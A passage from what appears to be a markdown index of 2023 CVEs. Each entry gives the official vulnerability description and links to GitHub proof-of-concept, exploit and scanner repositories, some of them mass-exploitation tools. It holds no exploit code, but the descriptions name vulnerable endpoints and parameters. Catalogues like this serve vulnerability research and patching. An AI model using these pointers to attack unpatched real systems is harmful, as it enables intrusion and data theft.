[Nian-Stars/CVE-2023-26255-6](https://github.com/Nian-Stars/CVE-2023-26255-6) + +### CVE-2023-26256 (2023-02-28) + +An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system. + + +- [0x7eTeam/CVE-2023-26256](https://github.com/0x7eTeam/CVE-2023-26256) +- [xhs-d/CVE-2023-26256](https://github.com/xhs-d/CVE-2023-26256) +- [qs119/CVE-2023-26256](https://github.com/qs119/CVE-2023-26256) +- [jcad123/CVE-2023-26256](https://github.com/jcad123/CVE-2023-26256) + +### CVE-2023-26258 (2023-07-03) + +Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator. + + +- [mdsecactivebreach/CVE-2023-26258-ArcServe](https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe) + +### CVE-2023-26262 (2023-03-14) + +An issue was discovered in Sitecore XP/XM 10.3. As an authenticated Sitecore user, a unrestricted language file upload vulnerability exists the can lead to direct code execution on the content management (CM) server. + + +- [istern/CVE-2023-26262](https://github.com/istern/CVE-2023-26262) + +### CVE-2023-26269 (2023-04-03) + +Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a \nmalicious local user.\n\nAdministrators are advised to disable JMX, or set up a JMX password.\n\nNote that version 3.7.4 onward will set up a JMX password automatically for Guice users.\n\n\n + + +- [mbadanoiu/CVE-2023-26269](https://github.com/mbadanoiu/CVE-2023-26269) + +### CVE-2023-26360 (2023-03-23) + +Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. + + +- [yosef0x01/CVE-2023-26360](https://github.com/yosef0x01/CVE-2023-26360) +- [jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit](https://github.com/jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit) +- [CuriousLearnerDev/ColdFusion_EXp](https://github.com/CuriousLearnerDev/ColdFusion_EXp) +- [issamjr/CVE-2023-26360](https://github.com/issamjr/CVE-2023-26360) + +### CVE-2023-26469 (2023-08-17) + +In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. + + +- [d0rb/CVE-2023-26469](https://github.com/d0rb/CVE-2023-26469) + +### CVE-2023-26563 (2023-07-12) + +The Syncfusion EJ2 Node File Provider 0102271 is vulnerable to filesystem-server.js directory traversal. As a result, an unauthenticated attacker can: - On Windows, list files in any directory, read any file, delete any file, upload any file to any directory accessible by the web server. - On Linux, read any file, download any directory, delete any file, upload any file to any directory accessible by the web server. + + +- [RupturaInfoSec/CVE-2023-26563-26564-26565](https://github.com/RupturaInfoSec/CVE-2023-26563-26564-26565) + +### CVE-2023-26602 (2023-02-26) + +ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution. + + +- [D1G17/CVE-2023-26602](https://github.com/D1G17/CVE-2023-26602) + +### CVE-2023-26607 (2023-02-26) + +In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c. + + +- [Trinadh465/linux-4.1.15_CVE-2023-26607](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-26607) + +### CVE-2023-26609 (2023-02-27) + +ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field. + + +- [D1G17/CVE-2023-26609](https://github.com/D1G17/CVE-2023-26609) + +### CVE-2023-26692 (2023-03-30) + +ZCBS Zijper Collectie Beheer Systeem (ZCBS), Zijper Publication Management System (ZPBS), and Zijper Image Bank Management System (ZBBS) 4.14k is vulnerable to Cross Site Scripting (XSS). + + +- [bigzooooz/CVE-2023-26692](https://github.com/bigzooooz/CVE-2023-26692) + +### CVE-2023-26785 (2024-10-17) + +MariaDB v10.5 was discovered to contain a remote code execution (RCE) vulnerability via UDF Code in a Shared Object File, followed by a "create function" statement. NOTE: this is disputed by the MariaDB Foundation because no privilege boundary is crossed. + + +- [Ant1sec-ops/CVE-2023-26785](https://github.com/Ant1sec-ops/CVE-2023-26785) + +### CVE-2023-26818 (2023-05-19) + +Telegram 9.3.1 and 9.4.0 allows attackers to access restricted files, microphone ,or video recording via the DYLD_INSERT_LIBRARIES flag. + + +- [Zeyad-Azima/CVE-2023-26818](https://github.com/Zeyad-Azima/CVE-2023-26818) + +### CVE-2023-26852 (2023-04-12) + +An arbitrary file upload vulnerability in the upload plugin of Textpattern v4.8.8 and below allows attackers to execute arbitrary code by uploading a crafted PHP file. + + +- [leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-](https://github.com/leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-) + +### CVE-2023-26866 (2023-04-04) + +GreenPacket OH736's WR-1200 Indoor Unit, OT-235 with firmware versions M-IDU-1.6.0.3_V1.1 and MH-46360-2.0.3-R5-GP respectively are vulnerable to remote command injection. Commands are executed using pre-login execution and executed with root privileges allowing complete takeover. + + +- [lionelmusonza/CVE-2023-26866](https://github.com/lionelmusonza/CVE-2023-26866) + +### CVE-2023-26976 (2023-04-04) + +Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function. + + +- [FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow) + +### CVE-2023-26982 (2023-03-29) + +Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function. + + +- [bypazs/CVE-2023-26982](https://github.com/bypazs/CVE-2023-26982) +- [bypazs/Duplicate-of-CVE-2023-26982](https://github.com/bypazs/Duplicate-of-CVE-2023-26982) + +### CVE-2023-26984 (2023-03-29) + +An issue in the password reset function of Peppermint v0.2.4 allows attackers to access the emails and passwords of the Tickets page via a crafted request. + + +- [bypazs/CVE-2023-26984](https://github.com/bypazs/CVE-2023-26984) + +### CVE-2023-27035 (2023-05-01) + +An issue discovered in Obsidian Canvas 1.1.9 allows remote attackers to send desktop notifications, record user audio and other unspecified impacts via embedded website on the canvas page. + + +- [fivex3/CVE-2023-27035](https://github.com/fivex3/CVE-2023-27035) + +### CVE-2023-27100 (2023-03-22) + +Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests. + + +- [DarokNET/CVE-2023-27100](https://github.com/DarokNET/CVE-2023-27100) +- [fabdotnet/CVE-2023-27100](https://github.com/fabdotnet/CVE-2023-27100) + +### CVE-2023-27163 (2023-03-31) + +request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request. + + +- [entr0pie/CVE-2023-27163](https://github.com/entr0pie/CVE-2023-27163) +- [seanrdev/cve-2023-27163](https://github.com/seanrdev/cve-2023-27163) +- [overgrowncarrot1/CVE-2023-27163](https://github.com/overgrowncarrot1/CVE-2023-27163) +- [ThickCoco/CVE-2023-27163-POC](https://github.com/ThickCoco/CVE-2023-27163-POC) +- [davuXVI/CVE-2023-27163](https://github.com/davuXVI/CVE-2023-27163) +- [HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53](https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53) +- [rvizx/CVE-2023-27163](https://github.com/rvizx/CVE-2023-27163) +- [thomas-osgood/CVE-2023-27163](https://github.com/thomas-osgood/CVE-2023-27163) +- [cowsecurity/CVE-2023-27163](https://github.com/cowsecurity/CVE-2023-27163) +- [samh4cks/CVE-2023-27163-InternalProber](https://github.com/samh4cks/CVE-2023-27163-InternalProber) +- [Hamibubu/CVE-2023-27163](https://github.com/Hamibubu/CVE-2023-27163) +- [KharimMchatta/basketcraft](https://github.com/KharimMchatta/basketcraft) +- [MasterCode112/CVE-2023-27163](https://github.com/MasterCode112/CVE-2023-27163) +- [Rubioo02/CVE-2023-27163](https://github.com/Rubioo02/CVE-2023-27163) +- [madhavmehndiratta/CVE-2023-27163](https://github.com/madhavmehndiratta/CVE-2023-27163) +- [Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning](https://github.com/Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning) +- [btar1gan/exploit_CVE-2023-27163](https://github.com/btar1gan/exploit_CVE-2023-27163) + +### CVE-2023-27216 (2023-04-12) + +An issue found in D-Link DSL-3782 v.1.03 allows remote authenticated users to execute arbitrary code as root via the network settings page. + + +- [FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection) +- [HoangREALER/CVE-2023-27216](https://github.com/HoangREALER/CVE-2023-27216) + +### CVE-2023-27326 (2024-05-03) + +Parallels Desktop Toolgate Directory Traversal Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system.\n. Was ZDI-CAN-18933. + + +- [Impalabs/CVE-2023-27326](https://github.com/Impalabs/CVE-2023-27326) +- [Malwareman007/CVE-2023-27326](https://github.com/Malwareman007/CVE-2023-27326) + +### CVE-2023-27327 (2024-05-03) + +Parallels Desktop Toolgate Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Toolgate component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-18964. + + +- [kn32/parallels-plist-escape](https://github.com/kn32/parallels-plist-escape) + +### CVE-2023-27350 (2023-04-20) + +This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987. + + +- [MaanVader/CVE-2023-27350-POC](https://github.com/MaanVader/CVE-2023-27350-POC) +- [imancybersecurity/CVE-2023-27350-POC](https://github.com/imancybersecurity/CVE-2023-27350-POC) +- [horizon3ai/CVE-2023-27350](https://github.com/horizon3ai/CVE-2023-27350) +- [adhikara13/CVE-2023-27350](https://github.com/adhikara13/CVE-2023-27350) +- [ThatNotEasy/CVE-2023-27350](https://github.com/ThatNotEasy/CVE-2023-27350) +- [Jenderal92/CVE-2023-27350](https://github.com/Jenderal92/CVE-2023-27350) +- [ASG-CASTLE/CVE-2023-27350](https://github.com/ASG-CASTLE/CVE-2023-27350) +- [rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability](https://github.com/rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability) + +### CVE-2023-27363 (2024-05-03) + +Foxit PDF Reader exportXFAData Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the exportXFAData method. The application exposes a JavaScript interface that allows writing arbitrary files. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-19697. + + +- [qwqdanchun/CVE-2023-27363](https://github.com/qwqdanchun/CVE-2023-27363) +- [webraybtl/CVE-2023-27363](https://github.com/webraybtl/CVE-2023-27363) +- [CN016/-Foxit-PDF-CVE-2023-27363-](https://github.com/CN016/-Foxit-PDF-CVE-2023-27363-) + +### CVE-2023-27372 (2023-02-28) + +SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. + + +- [nuts7/CVE-2023-27372](https://github.com/nuts7/CVE-2023-27372) +- [Chocapikk/CVE-2023-27372](https://github.com/Chocapikk/CVE-2023-27372) +- [dream434/CVE-2023-27372](https://github.com/dream434/CVE-2023-27372) +- [0SPwn/CVE-2023-27372-PoC](https://github.com/0SPwn/CVE-2023-27372-PoC) +- [izzz0/CVE-2023-27372-POC](https://github.com/izzz0/CVE-2023-27372-POC) +- [ThatNotEasy/CVE-2023-27372](https://github.com/ThatNotEasy/CVE-2023-27372) +- [redboltsec/CVE-2023-27372-PoC](https://github.com/redboltsec/CVE-2023-27372-PoC) +- [1amthebest1/CVE-2023-27372](https://github.com/1amthebest1/CVE-2023-27372) + +### CVE-2023-27470 (2023-09-11) + +BASupSrvcUpdater.exe in N-able Take Control Agent through 7.0.41.1141 before 7.0.43 has a TOCTOU Race Condition via a pseudo-symlink at %PROGRAMDATA%\GetSupportService_N-Central\PushUpdates, leading to arbitrary file deletion. + + +- [3lp4tr0n/CVE-2023-27470_Exercise](https://github.com/3lp4tr0n/CVE-2023-27470_Exercise) + +### CVE-2023-27524 (2023-04-24) + +Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.\n\nAll superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and encrypting sensitive information on the database.\nAdd a strong SECRET_KEY to your `superset_config.py` file like:\n\nSECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY>\n\nAlternatively you can set it with `SUPERSET_SECRET_KEY` environment variable.\n + + +- [horizon3ai/CVE-2023-27524](https://github.com/horizon3ai/CVE-2023-27524) +- [Okaytc/Superset_auth_bypass_check](https://github.com/Okaytc/Superset_auth_bypass_check) +- [ZZ-SOCMAP/CVE-2023-27524](https://github.com/ZZ-SOCMAP/CVE-2023-27524) +- [MaanVader/CVE-2023-27524-POC](https://github.com/MaanVader/CVE-2023-27524-POC) +- [ThatNotEasy/CVE-2023-27524](https://github.com/ThatNotEasy/CVE-2023-27524) +- [TardC/CVE-2023-27524](https://github.com/TardC/CVE-2023-27524) +- [necroteddy/CVE-2023-27524](https://github.com/necroteddy/CVE-2023-27524) +- [jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE](https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE) +- [CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-](https://github.com/CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-) +- [h1n4mx0/Research-CVE-2023-27524](https://github.com/h1n4mx0/Research-CVE-2023-27524) +- [karthi-the-hacker/CVE-2023-27524](https://github.com/karthi-the-hacker/CVE-2023-27524) +- [Cappricio-Securities/CVE-2023-27524](https://github.com/Cappricio-Securities/CVE-2023-27524) + +### CVE-2023-27532 (2023-03-10) + +Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts. + + +- [horizon3ai/CVE-2023-27532](https://github.com/horizon3ai/CVE-2023-27532) +- [sfewer-r7/CVE-2023-27532](https://github.com/sfewer-r7/CVE-2023-27532) +- [puckiestyle/CVE-2023-27532-RCE-Only](https://github.com/puckiestyle/CVE-2023-27532-RCE-Only) + +### CVE-2023-27564 (2023-05-10) + +The n8n package 0.218.0 for Node.js allows Information Disclosure. + + +- [david-botelho-mariano/exploit-CVE-2023-27564](https://github.com/david-botelho-mariano/exploit-CVE-2023-27564) + +### CVE-2023-27566 (2023-03-03) + +Cubism Core in Live2D Cubism Editor 4.2.03 allows out-of-bounds write via a crafted Section Offset Table or Count Info Table in an MOC3 file. + + +- [OpenL2D/moc3ingbird](https://github.com/OpenL2D/moc3ingbird) + +### CVE-2023-27587 (2023-03-13) + +ReadtoMyShoe, a web app that lets users upload articles and listen to them later, generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key. This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds. + + +- [vagnerd/CVE-2023-27587-PoC](https://github.com/vagnerd/CVE-2023-27587-PoC) + +### CVE-2023-27703 (2023-04-12) + +The Android version of pikpak v1.29.2 was discovered to contain an information leak via the debug interface. + + +- [happy0717/CVE-2023-27703](https://github.com/happy0717/CVE-2023-27703) + +### CVE-2023-27704 (2023-04-12) + +Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS). + + +- [happy0717/CVE-2023-27704](https://github.com/happy0717/CVE-2023-27704) + +### CVE-2023-27742 (2023-05-16) + +IDURAR ERP/CRM v1 was discovered to contain a SQL injection vulnerability via the component /api/login. + + +- [G37SYS73M/CVE-2023-27742](https://github.com/G37SYS73M/CVE-2023-27742) + +### CVE-2023-27746 (2023-04-13) + +BlackVue DR750-2CH LTE v.1.012_2022.10.26 was discovered to contain a weak default passphrase which can be easily cracked via a brute force attack if the WPA2 handshake is intercepted. + + +- [eyJhb/blackvue-cve-2023](https://github.com/eyJhb/blackvue-cve-2023) + +### CVE-2023-27842 (2023-03-21) + +Insecure Permissions vulnerability found in Extplorer File manager eXtplorer v.2.1.15 allows a remote attacker to execute arbitrary code via the index.php compenent + + +- [tristao-marinho/CVE-2023-27842](https://github.com/tristao-marinho/CVE-2023-27842) +- [cowsecurity/CVE-2023-27842](https://github.com/cowsecurity/CVE-2023-27842) + +### CVE-2023-27997 (2023-06-13) + +A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. + + +- [rio128128/CVE-2023-27997-POC](https://github.com/rio128128/CVE-2023-27997-POC) +- [BishopFox/CVE-2023-27997-check](https://github.com/BishopFox/CVE-2023-27997-check) +- [imbas007/CVE-2023-27997-Check](https://github.com/imbas007/CVE-2023-27997-Check) +- [puckiestyle/cve-2023-27997](https://github.com/puckiestyle/cve-2023-27997) +- [TechinsightsPro/ShodanFortiOS](https://github.com/TechinsightsPro/ShodanFortiOS) +- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997) +- [lexfo/xortigate-cve-2023-27997](https://github.com/lexfo/xortigate-cve-2023-27997) +- [delsploit/CVE-2023-27997](https://github.com/delsploit/CVE-2023-27997) +- [node011/CVE-2023-27997-POC](https://github.com/node011/CVE-2023-27997-POC) + +### CVE-2023-28121 (2023-04-12) + +An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. + + +- [gbrsh/CVE-2023-28121](https://github.com/gbrsh/CVE-2023-28121) +- [im-hanzou/Mass-CVE-2023-28121](https://github.com/im-hanzou/Mass-CVE-2023-28121) +- [rio128128/Mass-CVE-2023-28121-kdoec](https://github.com/rio128128/Mass-CVE-2023-28121-kdoec) +- [C04LA/CVE-2023-28121](https://github.com/C04LA/CVE-2023-28121) +- [Jenderal92/WP-CVE-2023-28121](https://github.com/Jenderal92/WP-CVE-2023-28121) +- [1337nemojj/CVE-2023-28121](https://github.com/1337nemojj/CVE-2023-28121) + +### CVE-2023-28197 (2024-01-10) + +An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4. An app may be able to access user-sensitive data. + + +- [spotlightishere/inputcontrol](https://github.com/spotlightishere/inputcontrol) + +### CVE-2023-28206 (2023-04-10) + +An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. + + +- [acceleratortroll/acceleratortroll](https://github.com/acceleratortroll/acceleratortroll) + +### CVE-2023-28218 (2023-04-11) + +Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability + + +- [h1bAna/CVE-2023-28218](https://github.com/h1bAna/CVE-2023-28218) + +### CVE-2023-28229 (2023-04-11) + +Windows CNG Key Isolation Service Elevation of Privilege Vulnerability + + +- [Y3A/CVE-2023-28229](https://github.com/Y3A/CVE-2023-28229) +- [byt3n33dl3/CrackKeyIso](https://github.com/byt3n33dl3/CrackKeyIso) + +### CVE-2023-28231 (2023-04-11) + +DHCP Server Service Remote Code Execution Vulnerability + + +- [TheHermione/CVE-2023-28231](https://github.com/TheHermione/CVE-2023-28231) + +### CVE-2023-28244 (2023-04-11) + +Windows Kerberos Elevation of Privilege Vulnerability + + +- [sk3w/cve-2023-28244](https://github.com/sk3w/cve-2023-28244) + +### CVE-2023-28252 (2023-04-11) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [fortra/CVE-2023-28252](https://github.com/fortra/CVE-2023-28252) +- [726232111/CVE-2023-28252](https://github.com/726232111/CVE-2023-28252) +- [Danasuley/CVE-2023-28252-](https://github.com/Danasuley/CVE-2023-28252-) +- [bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252](https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252) +- [duck-sec/CVE-2023-28252-Compiled-exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe) +- [byt3n33dl3/CLFS](https://github.com/byt3n33dl3/CLFS) +- [Vulmatch/CVE-2023-28252](https://github.com/Vulmatch/CVE-2023-28252) + +### CVE-2023-28324 (2023-06-30) + +A improper input validation vulnerability exists in Ivanti Endpoint Manager 2022 and below that could allow privilege escalation or remote code execution. + + +- [horizon3ai/CVE-2023-28324](https://github.com/horizon3ai/CVE-2023-28324) + +### CVE-2023-28329 (2023-03-23) + +Insufficient validation of profile field availability condition resulted in an SQL injection risk (by default only available to teachers and managers). + + +- [cli-ish/CVE-2023-28329](https://github.com/cli-ish/CVE-2023-28329) + +### CVE-2023-28330 (2023-03-23) + +Insufficient sanitizing in backup resulted in an arbitrary file read risk. The capability to access this feature is only available to teachers, managers and admins by default. + + +- [cli-ish/CVE-2023-28330](https://github.com/cli-ish/CVE-2023-28330) + +### CVE-2023-28343 (2023-03-14) + +OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php. + + +- [gobysec/CVE-2023-28343](https://github.com/gobysec/CVE-2023-28343) +- [superzerosec/CVE-2023-28343](https://github.com/superzerosec/CVE-2023-28343) +- [hba343434/CVE-2023-28343](https://github.com/hba343434/CVE-2023-28343) + +### CVE-2023-28354 +- [stormfleet/CVE-2023-28354](https://github.com/stormfleet/CVE-2023-28354) + +### CVE-2023-28432 (2023-03-22) + +Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY`\nand `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. + + +- [Mr-xn/CVE-2023-28432](https://github.com/Mr-xn/CVE-2023-28432) +- [gobysec/CVE-2023-28432](https://github.com/gobysec/CVE-2023-28432) +- [Okaytc/minio_unauth_check](https://github.com/Okaytc/minio_unauth_check) +- [MzzdToT/CVE-2023-28432](https://github.com/MzzdToT/CVE-2023-28432) +- [acheiii/CVE-2023-28432](https://github.com/acheiii/CVE-2023-28432) +- [steponeerror/Cve-2023-28432-](https://github.com/steponeerror/Cve-2023-28432-) +- [Cuerz/CVE-2023-28432](https://github.com/Cuerz/CVE-2023-28432) +- [LHXHL/Minio-CVE-2023-28432](https://github.com/LHXHL/Minio-CVE-2023-28432) +- [h0ng10/CVE-2023-28432_docker](https://github.com/h0ng10/CVE-2023-28432_docker) +- [CHINA-china/MinIO_CVE-2023-28432_EXP](https://github.com/CHINA-china/MinIO_CVE-2023-28432_EXP) +- [TaroballzChen/CVE-2023-28432-metasploit-scanner](https://github.com/TaroballzChen/CVE-2023-28432-metasploit-scanner) +- [bingtangbanli/CVE-2023-28432](https://github.com/bingtangbanli/CVE-2023-28432) +- [Chocapikk/CVE-2023-28432](https://github.com/Chocapikk/CVE-2023-28432) +- [yTxZx/CVE-2023-28432](https://github.com/yTxZx/CVE-2023-28432) +- [unam4/CVE-2023-28432-minio_update_rce](https://github.com/unam4/CVE-2023-28432-minio_update_rce) +- [C1ph3rX13/CVE-2023-28432](https://github.com/C1ph3rX13/CVE-2023-28432) +- [netuseradministrator/CVE-2023-28432](https://github.com/netuseradministrator/CVE-2023-28432) +- [xk-mt/CVE-2023-28432](https://github.com/xk-mt/CVE-2023-28432) +- [0xRulez/CVE-2023-28432](https://github.com/0xRulez/CVE-2023-28432) + +### CVE-2023-28434 (2023-03-22) + +Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing `PostPolicyBucket`. To carry out this attack, the attacker requires credentials with `arn:aws:s3:::*` permission, as well as enabled Console API access. This issue has been patched in RELEASE.2023-03-20T20-16-18Z. As a workaround, enable browser API access and turn off `MINIO_BROWSER=off`. \n + + +- [AbelChe/evil_minio](https://github.com/AbelChe/evil_minio) + +### CVE-2023-28447 (2023-03-28) + +Smarty is a template engine for PHP. In affected versions smarty did not properly escape javascript code. An attacker could exploit this vulnerability to execute arbitrary JavaScript code in the context of the user's browser session. This may lead to unauthorized access to sensitive user data, manipulation of the web application's behavior, or unauthorized actions performed on behalf of the user. Users are advised to upgrade to either version 3.1.48 or to 4.3.1 to resolve this issue. There are no known workarounds for this vulnerability. + + +- [drkbcn/lblfixer_cve_2023_28447](https://github.com/drkbcn/lblfixer_cve_2023_28447) + +### CVE-2023-28467 (2023-05-22) + +In MyBB before 1.8.34, there is XSS in the User CP module via the user email field. + + +- [ahmetaltuntas/CVE-2023-28467](https://github.com/ahmetaltuntas/CVE-2023-28467) + +### CVE-2023-28588 (2023-12-05) + +Transient DOS in Bluetooth Host while rfc slot allocation. + + +- [uthrasri/CVE-2023-28588](https://github.com/uthrasri/CVE-2023-28588) +- [Trinadh465/CVE-2023-28588](https://github.com/Trinadh465/CVE-2023-28588) +- [uthrasri/CVE-2023-28588_system_bt](https://github.com/uthrasri/CVE-2023-28588_system_bt) +- [uthrasri/CVE-2023-28588_Singlefile](https://github.com/uthrasri/CVE-2023-28588_Singlefile) +- [uthrasri/G2.5_CVE-2023-28588](https://github.com/uthrasri/G2.5_CVE-2023-28588) +- [uthrasri/CVE-2023-28588_G2.5_singlefile](https://github.com/uthrasri/CVE-2023-28588_G2.5_singlefile) + +### CVE-2023-28753 (2023-05-18) + +netconsd prior to v0.2 was vulnerable to an integer overflow in its parse_packet function. A malicious individual could leverage this overflow to create heap memory corruption with attacker controlled data. + + +- [pingjuiliao/CVE-2023-28753](https://github.com/pingjuiliao/CVE-2023-28753) + +### CVE-2023-28771 (2023-04-25) + +Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device. + + +- [benjaminhays/CVE-2023-28771-PoC](https://github.com/benjaminhays/CVE-2023-28771-PoC) + +### CVE-2023-28772 (2023-03-23) + +An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow. + + +- [Trinadh465/linux-4.1.15_CVE-2023-28772](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-28772) +- [Satheesh575555/linux-4.1.15_CVE-2023-28772](https://github.com/Satheesh575555/linux-4.1.15_CVE-2023-28772) +- [hshivhare67/kernel_v4.1.15_CVE-2023-28772](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2023-28772) + +### CVE-2023-28810 (2023-06-15) + +Some access control/intercom products have unauthorized modification of device network configuration vulnerabilities. Attackers can modify device network configuration by sending specific data packets to the vulnerable interface within the same local network. + + +- [skylightcyber/CVE-2023-28810](https://github.com/skylightcyber/CVE-2023-28810) + +### CVE-2023-29007 (2023-04-25) + +Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated 